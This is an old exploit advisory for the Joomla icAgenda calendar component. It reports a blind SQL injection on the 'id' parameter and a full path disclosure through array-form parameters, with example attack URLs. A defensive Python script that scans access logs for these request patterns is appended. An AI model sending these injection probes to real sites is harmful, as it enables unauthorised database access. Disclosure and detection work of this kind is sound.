# Souhail Hammou - Independent Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail : dark-puzzle@live.fr
# Greetings to all Moroccan researchers and white hats .
------------------------------------------------------------------------------
# Exploit Title: Joomla Component (com_icagenda) Multiple Vulnerabilities .
# Author: Dark-Puzzle (Souhail Hammou)
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps
# Tested on: Windows Xp Sp2 Fr .
# OSVDB ID : 85147 and 85148 .
# OSVDB Links : http://osvdb.org/show/osvdb/85148 & http://osvdb.org/show/osvdb/85147
***************************************************************************************
Info :
Icagenda is a new component for event management with a calendar module.
----------------------------------------------------
I - Blind SQL Injection Vulnerability
----------------------------------------------------
Vulnerability : The "id" parameter in com_icagenda is prone to a Blind SQL Injection vulnerability. An attacker can retrieve and steal data by sending a series of True and False queries through SQL statements.
Here, the content that disappears from the page on the False query shows that the target suffers from a Blind SQL Injection vulnerability.
Example :
server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)
ADMIN PANEL : http://target/administrator
-----------------------------------------------------
II - Full Path Disclosure Vulnerability
-----------------------------------------------------
The full path can be retrieved using the array method [] in the Itemid & id parameters.
Example :
http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
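
Detection sketch for both issues above, added here as an example and not part of the original advisory: it scans web access logs for com_icagenda requests whose id or Itemid value is not a plain integer (section I) or is passed in array form (section II). The log format (combined), the function names, the sample entries and the rule that legitimate values are always plain integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

WATCHED = ("id", "itemid")  # parameters named in the advisory (lower-cased)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /index.php?option=com_icagenda'
    '&view=list&layout=event&Itemid=520&id=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2013:10:00:05 +0000] "GET /index.php?option=com_icagenda'
    '&view=list&layout=event&Itemid=520&id=1%20and%201=2 HTTP/1.1" 200 3010',
    '192.0.2.44 - - [01/Jan/2013:10:00:09 +0000] "GET /index.php?option=com_icagenda'
    '&view=list&layout=event&Itemid=520&id%5B%5D=1 HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2013:10:01:00 +0000] "GET /index.php?option=com_content'
    '&id=abc HTTP/1.1" 200 4000',
]

def classify(url):
    """Return findings for one request URL; an empty list means nothing flagged."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    params = [(name.lower(), value) for name, value in pairs]
    if ("option", "com_icagenda") not in params:
        return []  # only the component covered by the advisory is inspected
    findings = []
    for name, value in params:
        base = name.split("[", 1)[0]
        if base not in WATCHED:
            continue
        if "[" in name:
            # Array form (id[]=...), the trigger for the full path disclosure.
            findings.append(f"array-parameter:{base}")
        elif not re.fullmatch(r"[0-9]+", value):
            # Assumption: valid values are plain integers, so anything else
            # (such as an appended boolean condition) is worth reviewing.
            findings.append(f"non-integer:{base}")
    return findings

def scan(log_lines):
    """Yield (line_number, findings) for each flagged access-log entry."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            yield number, findings

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same two conditions (integer-only value, no array form) are what server-side input validation for these parameters should enforce before the value reaches a query.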